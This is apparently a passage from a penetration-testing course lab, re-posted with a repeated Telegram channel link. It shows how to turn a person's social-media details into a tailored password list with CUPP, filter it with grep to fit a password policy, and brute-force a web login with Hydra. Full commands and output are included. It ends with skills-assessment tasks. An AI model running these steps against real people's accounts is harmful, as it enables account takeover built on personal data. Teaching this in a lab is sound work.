CUPP's effectiveness hinges on the depth of your intelligence. For example, let's say you
have put together this profile based on Jane Smith's Facebook postings.


 Field                Details

 Name             Jane Smith

 Nickname          Janey

 Birthdate          December 11, 1990

 Relationship Status   In a relationship with Jim

 Partner's Name     Jim (Nickname: Jimbo)

 Partner's Birthdate  December 12, 1990

 Pet                Spot

 Company          AHI

 Interests            Hackers, Pizza, Golf, Horses
      https://t.me/offenciveSec
 Field                Details

 Favorite Colors      Blue


CUPP will then take your inputs and create a comprehensive list of potential passwords:

     Original and Capitalized: jane , Jane
    Reversed Strings: enaj , enaJ
     Birthdate Variations: jane1994 , smith2708
     Concatenations: janesmith , smithjane
    Appending Special Characters: jane! , smith@
    Appending Numbers: jane123 , smith2024
    Leetspeak Substitutions: j4n3 , 5m1th
    Combined Mutations: Jane1994! , smith2708@

This process results in a highly personalized wordlist, significantly more likely to contain
Jane's actual password than any generic, off-the-shelf dictionary could ever hope to achieve.
This focused approach dramatically increases the odds of success in our password-cracking
endeavors.

If you're using Pwnbox, CUPP is likely pre-installed. Otherwise, install it using:


  sudo apt install cupp -y



Invoke CUPP in interactive mode, CUPP will guide you through a series of questions about
your target, enter the following as prompted:


  cupp -i


  ___________
     cupp.py!                 # Common
        \                     # User
         \   ,__,             # Passwords
          \  (oo)____         # Profiler
             (__)    )\
                ||--|| *      [ Muris Kurgas | [email protected] ]
                              [ Mebus | https://github.com/Mebus/]


  [+] Insert the information about the victim to make a dictionary
  [+] If you don't know all the info, just hit enter when asked! ;)


  > First Name: Jane
  > Surname: Smith
  > Nickname: Janey
  > Birthdate (DDMMYYYY): 11121990
      https://t.me/offenciveSec
  > Partners) name: Jim
  > Partners) nickname: Jimbo
  > Partners) birthdate (DDMMYYYY): 12121990


  > Child's name:
  > Child's nickname:
  > Child's birthdate (DDMMYYYY):


  > Pet's name: Spot
  > Company name: AHI


  > Do you want to add some key words about the victim? Y/[N]: y
  > Please enter the words, separated by comma. [i.e. hacker,juice,black],
  spaces will be removed: hacker,blue
  > Do you want to add special chars at the end of words? Y/[N]: y
  > Do you want to add some random numbers at the end of words? Y/[N]:y
  > Leet mode? (i.e. leet = 1337) Y/[N]: y


  [+] Now making a dictionary...
  [+] Sorting list and removing duplicates...
  [+] Saving dictionary to jane.txt, counting 46790 words.
  [+] Now load your pistolero with jane.txt and shoot! Good luck!



We now have a generated username.txt list and jane.txt password list, but there is one more
thing we need to deal with. CUPP has generated many possible passwords for us, but
Jane's company, AHI, has a rather odd password policy.

    Minimum Length: 6 characters

    Must Include:
          At least one uppercase letter
          At least one lowercase letter

          At least one number
          At least two special characters (from the set !@#$%^&* )

As we did earlier, we can use grep to filter that password list to match that policy:


  grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E
  '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jane-filtered.txt



This command efficiently filters jane.txt to match the provided policy, from ~46000
passwords to a possible ~7900. It first ensures a minimum length of 6 characters, then
checks for at least one uppercase letter, one lowercase letter, one number, and finally, at
      https://t.me/offenciveSec
least two special characters from the specified set. The filtered results are stored in jane-
filtered.txt .

Use the two generated lists in Hydra against the target to brute-force the login form.
Remember to change the target info for your instance.


  hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form
  "/:username=^USER^&password=^PASS^:Invalid credentials"


  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use
  in military or secret service organizations, or for illegal purposes (this
  is non-binding, these * ignore laws and ethics anyway).


  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05
  11:47:14
  [DATA] max 16 tasks per 1 server, overall 16 tasks, 655060 login tries
  (l:14/p:46790), ~40942 tries per task
  [DATA] attacking http-post-
  form://IP:PORT/:username=^USER^&password=^PASS^:Invalid credentials
  [PORT][http-post-form] host: IP   login: ...   password: ...
  [STATUS] attack finished for IP (valid pair found)
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05
  11:47:18



Once Hydra has completed the attack, log into the website using the discovered credentials
and retrieve the flag.

Skills Assessment Part 1




The first part of the skills assessment will require you to brute-force the the target instance.
Successfully finding the correct login will provide you with the username you will need to
start Skills Assessment Part 2.

You might find the following wordlists helpful in this engagement: usernames.txt and
passwords.txt

Skills Assessment Part 2




This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART
BEFORE STARTING THIS . Use the username you were given when you completed part 1 of
      https://t.me/offenciveSec
the skills assessment to brute force the login on the target instance.





      https://t.me/offenciveSec